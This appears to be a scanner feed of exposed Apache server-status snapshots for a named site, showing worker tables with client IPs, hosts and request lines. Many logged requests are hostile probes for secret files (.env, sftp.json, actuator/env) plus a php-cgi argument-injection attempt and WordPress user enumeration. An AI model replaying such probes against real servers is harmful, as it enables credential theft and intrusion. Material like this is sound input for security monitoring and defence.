172.70.215.67h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3979892680/848/52416_ 63.576440289053040.022.511469.51 172.69.255.141h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3979892680/794/53698_ 64.356450316967860.016.071650.65 103.8.24.62http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /core/.env HTTP/1.1 3-3979892680/840/52835_ 63.81177013339894620.021.351758.67 104.23.254.107h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3979892680/849/53159_ 64.37644127265547750.018.661536.52 103.8.24.62http/1.1barrerasdecontencion.com:443GET /.env.save HTTP/1.1 3-3979892680/888/53149_ 64.37644216251201840.033.151655.48 103.8.24.62http/1.1barrerasdecontencion.com:443GET /env.production HTTP/1.1 3-3979892680/810/53525_ 63.476440296677910.014.091701.14 162.158.30.136h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3979892680/780/53459_ 63.346450377244900.022.571683.28 172.64.217.40h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3979892680/778/52578_ 63.366441915683620.017.431613.59 172.69.34.221h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3979892680/862/53828_ 64.37644206393933700.019.121593.96 103.8.24.62http/1.1barrerasdecontencion.com:443GET /.env HTTP/1.1 4-3979892670/428/45563_ 38.946450397731410.011.331431.03 162.158.120.171h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3979892670/374/45711_ 39.82645200268847750.09.851498.98 103.8.24.62http/1.1barrerasdecontencion.com:443GET /app/.env HTTP/1.1 4-3979892670/428/45798_ 37.486451229600070.09.591547.24 172.69.196.215h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3979892670/401/46002_ 40.001290245140400.027.031463.24 172.70.115.235h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3979892670/428/45241_ 39.8312902567
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3136100b2736100b270c38f777
Apache Status Apache Server Status for www.pre.relehse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Saturday, 22-Nov-2025 20:58:35 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 383 Parent Server MPM Generation: 382 Server uptime: 71 days 8 hours 37 minutes 33 seconds Server load: 0.58 0.55 0.36 Total accesses: 2240739 - Total Traffic: 69.4 GB - Total Duration: 1400871835 CPU Usage: u180.94 s232.29 cu12368 cs7082.55 - .322% CPU load .363 requests/sec - 11.8 kB/second - 32.5 kB/request - 625.183 ms/request 2 requests currently being processed, 48 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0564020no0yes010000 1564019no0yes010000 2564022no0yes010000 3564157no1yes19000 4564021no1yes19000 Sum502 248000 _____________________________________W_______R____ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-3825640200/12/42071_ 6.5510420317883360.00.221570.03 172.71.148.151h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3825640200/13/41447_ 6.2718860471618270.00.621347.37 162.158.162.46h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3825640200/13/41858_ 4.5218810185069660.00.021380.23 103.4.251.79http/1.1 0-3825640200/12/41599_ 4.5018810200791280.00.081385.17 139.162.173.209http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3825640200/13/42171_ 4.5118810189043970.00.141431.52 139.162.173.209http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /webportal.cgi HTTP/1.1 0-3825640200/13/41971_ 5.7218811195315320.00.081417.88 103.4.251.79http/1.1relehse.com:443GET /admin_layout/plugins/validation/jquery.validate.min.js HTT 0-3825640200/16/42150_ 6.2718860270026940.00.071338.03 162.158.162.12h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3825640200/13/41539_ 5.2710420179496980.00.141404.71 162.159.106.25h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3825640200/14/42082_ 4.5110370193572670.00.181321.07 139.162.173.209http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /css/elfinder.min.css HTTP/1.1 0-3825640200/15/41905_ 5.2710370305419610.00.051509.60 172.71.166.36h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3825640190/15/46342_ 6.9370205290880.00.271511.98 142.93.143.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger-ui.html HTTP/1.1 1-3825640190/12/46958_ 4.5810590243568110.00.151517.01 139.162.173.209http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3825640190/19/46556_ 4.5610480250662440.00.051461.04 139.162.173.209http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3825640190/21/46388_ 5.3210590697624430.00.141427.13 162.158.175.179h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3825640190/13/47145_ 6.3210430221530510.00.161507.22 172.71.124.215h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3825640190/13/47638_ 6.92100217506530.00.111422.85 142.93.143.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api/graphql HTTP/1.1 1-3825640190/12/46865_ 6.5810483254007420.00.031421.86 172.70.240.134h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3825640190/17/47299_ 6.587631204262150.00.071436.19 172.69.33.249h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3825640190/8/45695_ 4.5610430331737160.00.071295.38 139.162.173.209http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3825640190/14/47034_ 4.58100457375480.00.051377.30 139.162.173.209http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3825640220/12/43979_ 7.1610140226425670.00.221347.84 172.70.240.16h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3825640220/12/43000_ 7.138030369784720.00.031257.63 45.56.66.228http/1.1 2-3825640220/11/43677_ 4.9110320281711180.00.051370.86 139.162.173.209http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3825640220/12/42983_ 4.9610090212902960.00.471294.20 139.162.173.209http/1.1 2-3825640220/7/43136_ 4.9510400181056700.00.021479.89 139.162.173.209http/1.1 2-3825640220/8/43599_ 4.9610360203267840.00.251277.99 139.162.173.209http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3825640220/11/43144_ 7.1410320200868300.00.101325.35 172.70.248.193h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3825640220/11/43411_ 7.1210090219267370.00.061326.27 172.68.192.225h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3825640220/13/43467_ 7.1510370220915550.00.411505.05 172.71.172.138h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3825640220/5/43605_ 4.9510360241292590.00.041383.70 139.162.173.209http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3825641570/504/48942_ 20.0900295293010.06.651537.24 142.93.143.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-3825641570/508/47477_ 20.0720261827950.05.671343.23 142.93.143.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /webjars/swagger-ui/index.html HTTP/1.1 3-3825641570/516/48700_ 20.0820281798760.07.571523.92 142.93.143.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 3-3825641570/532/47923_ 20.0810309942850.06.421632.07 142.93.143.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 3-3825641570/523/47968_ 20.1000233392820.05.881398.64 142.93.143.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-3825641570/525/47890_ 20.0800219231000.07.441513.35 142.93.143.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 3-3825641570/519/48382_ 20.0800267447250.07.081573.32 142.93.143.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 3-3825641570/528/48285W 20.0800345219200.06.141538.87 142.93.143.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 3-3825641570/501/47608_ 20.1000877822950.04.751469.81 142.93.143.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 3-3825641570/492/48659_ 20.0810364318990.05.971485.07 142.93.143.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 4-3825640210/186/43808_ 14.150164370629880.04.221370.61 162.158.172.37h2tandemsl.com:443idle, streams: 0/78/78/0/0 (open/recv/resp/push/rst) 4-3825640210/194/43878_ 14.150193259183380.019.231443.90 162.158.172.37h2tandemsl.com:443idle, streams: 0/79/79/0/0 (open/recv/resp/push/rst) 4-3825640210/221/43901_ 14.141146219119670.02.421477.23 162.158.172.37h2tandemsl.com:443idle, streams: 0/75/75/0/0 (open/recv/resp/push/rst) 4-3825640210/175/44241_ 14.1510235685520.02.891333.67 142.93.143.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 4-3825640210/176/43496_ 14.141188246363280.02.421300.39 162.158.172.37h2tandemsl.com:443idle, streams: 0/74/74/0/0 (open/recv/resp/push/rst)
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3136100b2736100b27d6d76ae5
Apache Status Apache Server Status for www.pre.relehse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Thursday, 20-Nov-2025 23:43:04 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 373 Parent Server MPM Generation: 372 Server uptime: 69 days 11 hours 22 minutes 1 second Server load: 0.04 0.14 0.16 Total accesses: 2178889 - Total Traffic: 67.9 GB - Total Duration: 1326817600 CPU Usage: u221.42 s238.52 cu11991 cs6794.96 - .321% CPU load .363 requests/sec - 11.9 kB/second - 32.7 kB/request - 608.942 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0371969no0yes010000 1371836no0yes010000 2371835no0yes010000 3371837no0yes010000 4371838no0yes19000 Sum500 149000 _____________________________________________W____ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-3723719690/472/41630_ 35.1100310146020.08.111552.11 167.71.81.114http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-3723719690/505/40991_ 35.1000462480430.09.951335.35 167.71.81.114http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/api-docs HTTP/1.1 0-3723719690/486/41447_ 35.070357177881280.09.961358.40 162.159.104.89h2tandemsl.com:443idle, streams: 0/4/4/0/0 (open/recv/resp/push/rst) 0-3723719690/460/41169_ 35.1120195220560.09.761375.06 167.71.81.114http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 0-3723719690/456/41755_ 35.1110183339630.028.121420.60 167.71.81.114http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 0-3723719690/486/41515_ 35.1110191188190.09.331394.71 167.71.81.114http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 0-3723719690/491/41724_ 35.0920261793760.036.931324.90 167.71.81.114http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/swagger-ui.html HTTP/1.1 0-3723719690/484/41062_ 35.1110175930570.09.521393.68 167.71.81.114http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 0-3723719690/485/41650_ 35.1100188388700.014.691303.60 167.71.81.114http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 0-3723719690/469/41489_ 35.1100222619600.011.391494.51 167.71.81.114http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 1-3723718360/118/46140_ 16.6950201074430.02.411508.68 167.71.81.114http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/index.html HTTP/1.1 1-3723718360/103/46702_ 16.7020232635230.02.481511.90 167.71.81.114http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 1-3723718360/116/46327_ 16.7030245922270.03.861457.55 167.71.81.114http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v3/api-docs HTTP/1.1 1-3723718360/114/46168_ 15.7950692607780.02.691423.52 108.162.210.103h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3723718360/98/46931_ 16.121778275212730750.02.421503.19 172.70.58.131h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-3723718360/107/47382_ 16.131777711213612230.02.271417.04 172.70.58.131h2tandemsl.com:443idle, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 1-3723718360/100/46650_ 15.6217720249347420.01.531418.11 172.68.134.35h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3723718360/102/47080_ 15.5830198496770.03.421421.42 162.158.122.17h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3723718360/105/45472_ 15.8517720327406700.02.811289.77 172.71.170.168h2tandemsl.com:443done, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 1-3723718360/114/46831_ 16.122210453622670.02.201372.05 172.70.58.131h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3723718350/41/42454_ 9.0633280206909010.00.321303.77 143.244.168.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 2-3723718350/41/41490_ 9.4633230352580940.01.481224.20 162.158.186.19h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3723718350/42/42133_ 10.1130821269718250.00.721336.26 142.93.143.8http/1.1relehse.com:443GET /.DS_Store HTTP/1.1 2-3723718350/46/41413_ 10.363087580200675430.00.401261.49 172.70.94.10h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3723718350/49/41663_ 9.0837890168316710.00.571434.61 104.23.187.244h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3723718350/35/42070_ 8.11379164193688470.01.471240.68 13.74.149.244http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3723718350/30/41635_ 9.07308266186017010.00.281271.75 197.254.237.210http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3723718350/43/41885_ 8.143323648195307260.00.361290.46 172.71.235.68h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3723718350/47/41950_ 10.2633280200894540.00.521456.47 162.158.122.53h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3723718350/37/42009_ 10.11378910227509390.00.301337.51 142.93.143.8http/1.1relehse.com:443GET /?rest_route=/wp/v2/users/ HTTP/1.1 3-3723718370/37/46784_ 8.6127320274440200.00.961497.91 172.68.211.48h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3723718370/27/45522_ 10.5327380236497910.00.571310.97 172.68.12.146h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3723718370/24/46744_ 9.433790612269964960.021.991488.36 172.69.65.78h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3723718370/23/45928_ 10.3433280292895930.00.461556.56 162.158.122.135h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3723718370/25/45815_ 9.4433230213321270.00.591365.25 172.64.217.128h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3723718370/31/45903_ 10.1737901207911570.00.601478.56 142.93.143.8http/1.1relehse.com:443GET /admin_layout/plugins/.DS_Store HTTP/1.1 3-3723718370/26/46378_ 9.4433230249910910.00.701515.31 172.64.217.183h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3723718370/27/46337_ 8.032737769326214800.00.581475.88 172.70.144.67h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 3-3723718370/24/45743_ 10.0733280865485950.00.621440.39 104.22.7.124h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3723718370/28/46728_ 9.0127320351649820.00.501448.05 104.23.187.137h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3723718380/454/41736_ 39.7820354276540.08.641332.38 167.71.81.114http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 4-3723718380/487/41701_ 39.5060225167380.016.771376.97 104.23.160.124h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3723718380/512/41925_ 39.7830197743900.010.911418.40 167.71.81.114http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 4-3723718380/464/42266_ 39.7860218676510.022.641295.67 167.71.81.114http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api/gql HTTP/1.1 4-3723718380/472/41690_ 39.66472233626480
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3136100b2736100b274a1034ed
Apache Status Apache Server Status for www.pre.relehse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Sunday, 16-Nov-2025 17:27:07 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 355 Parent Server MPM Generation: 354 Server uptime: 65 days 5 hours 6 minutes 4 seconds Server load: 0.16 0.12 0.09 Total accesses: 2041376 - Total Traffic: 63.5 GB - Total Duration: 1245410736 CPU Usage: u138.53 s191.03 cu11254.7 cs6373.93 - .319% CPU load .362 requests/sec - 11.8 kB/second - 32.6 kB/request - 610.084 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 04126551no0yes010000 14126554no0yes19000 24126552no1yes010000 34126685no1yes010000 44126553no0yes010000 Sum502 149000 _______________W__________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-35441265510/2/37623_ 0.482050290767960.00.001394.76 172.71.241.21h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-35441265510/1/36954_ 0.462061441960870.00.041233.31 172.68.14.146h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-35441265510/0/37316_ 0.002060157924730.00.001245.55 162.158.122.100h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-35441265510/0/37354_ 0.002870176511250.00.001298.64 162.158.122.60h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-35441265510/2/37643_ 0.532100163473880.00.001286.87 141.101.98.173h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-35441265510/3/37638_ 0.532110172259680.00.001270.35 172.64.192.107h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-35441265510/0/37708_ 0.002050241996580.00.001184.94 162.158.122.5h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-35441265510/1/37244_ 0.532100156689000.00.001261.43 172.71.178.152h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-35441265510/0/37534_ 0.00205204167716360.00.001193.97 172.71.120.144h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-35441265510/0/37387_ 0.002110196213880.00.001315.44 162.158.120.206h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-35441265540/2/43580_ 0.5246889190257720.00.001394.68 172.68.134.235h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-35441265540/0/44241_ 0.00410219007610.00.001416.85 172.68.134.189h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-35441265540/1/43809_ 0.5420230057790.00.001378.63 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api/gql HTTP/1.1 1-35441265540/0/43658_ 0.0020676621220.00.001333.89 162.158.120.217h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-35441265540/0/44391_ 0.00287402184234460.00.001402.55 162.158.179.206h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-35441265540/1/44912W 0.4200197633130.00.011331.68 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 1-35441265540/1/44266_ 0.432860236591250.00.001349.01 162.158.216.197h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-35441265540/0/44672_ 0.00286370188481160.00.001321.50 172.70.215.114h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-35441265540/1/42927_ 0.422870302395330.00.001212.00 172.69.224.173h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-35441265540/1/44330_ 0.43410436607820.00.001297.08 172.70.162.108h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-35441265520/18/41239_ 1.1210200482310.00.061253.08 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 2-35441265520/12/40294_ 1.041165346809090.00.191189.07 88.13.236.59h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-35441265520/15/41006_ 1.1210264612040.00.271279.62 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 2-35441265520/12/40228_ 1.1210195033310.00.371217.45 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 2-35441265520/13/40539_ 1.10121163018850.00.101405.57 172.68.135.66h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-35441265520/18/40860_ 1.1210187902760.00.221202.91 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 2-35441265520/8/40455_ 0.931330180577500.00.211222.95 172.71.241.15h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-35441265520/13/40696_ 1.1200189867460.00.101259.79 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v3/api-docs HTTP/1.1 2-35441265520/5/40777_ 1.1310195255050.00.061420.55 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 2-35441265520/10/40810_ 1.1300221625440.00.101276.13 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 3-35441266850/20/44256_ 1.2500259951650.00.211392.66 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 3-35441266850/12/42915_ 1.2510221433800.00.101241.74 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/v1/swagger.json HTTP/1.1 3-35441266850/20/44000_ 1.2600256625880.00.161380.19 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-35441266850/14/43345_ 1.2400276725390.00.141448.51 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api HTTP/1.1 3-35441266850/11/43265_ 1.2500200477340.00.101295.98 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 3-35441266850/19/43295_ 1.2500196503460.021.531382.00 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-35441266850/14/43710_ 1.2500232550160.00.071435.59 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 3-35441266850/11/43735_ 1.23113309330980.00.101371.59 88.13.236.59h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-35441266850/15/42978_ 1.2400849305340.00.431367.62 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api/graphql HTTP/1.1 3-35441266850/14/44167_ 1.2410337410630.00.091376.73 206.81.24.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /graphql/api HTTP/1.1 4-35441265530/1/38264_ 0.152870333771360.00.001224.65 172.71.167.104h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-35441265530/1/38365_ 0.402920202974200.00.001275.25 162.158.216.177h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-35441265530/0/38515_ 0.0029219177092000.00.001299.51 88.13.236.59h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-35441265530/0/38816_ 0.002870192629690.00.001166.06 138.197.118.84http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-35441265530/1/38242_ 0.422100215313810.00.001162.37 172.69.195.153h2lcftech.es:443idle, streams: 0/1/1/
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3136100b2736100b27f1137067
Apache Status Apache Server Status for www.pre.relehse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Friday, 14-Nov-2025 20:06:26 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 344 Parent Server MPM Generation: 343 Server uptime: 63 days 7 hours 45 minutes 24 seconds Server load: 0.06 0.08 0.16 Total accesses: 2008201 - Total Traffic: 62.6 GB - Total Duration: 1149371245 CPU Usage: u151.93 s193 cu10988.2 cs6200.49 - .32% CPU load .367 requests/sec - 12.0 kB/second - 32.7 kB/request - 572.339 ms/request 2 requests currently being processed, 48 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03949547no0yes010000 13949546no0yes010000 23949549no0yes010000 33949548no2yes28000 43949682no0yes010000 Sum502 248000 _______________________________W_______R__________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-34339495470/14/37524_ 2.8940290323920.00.241391.91 206.81.24.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/index.html HTTP/1.1 0-34339495470/11/36861_ 2.8920441465670.00.131231.63 206.81.24.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 0-34339495470/10/37232_ 2.6540157543130.00.151244.12 162.158.187.66h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-34339495470/4/37255_ 2.40421176139950.00.031296.46 162.158.123.73h2tandemsl.com:443done, streams: 0/1/1/0/0 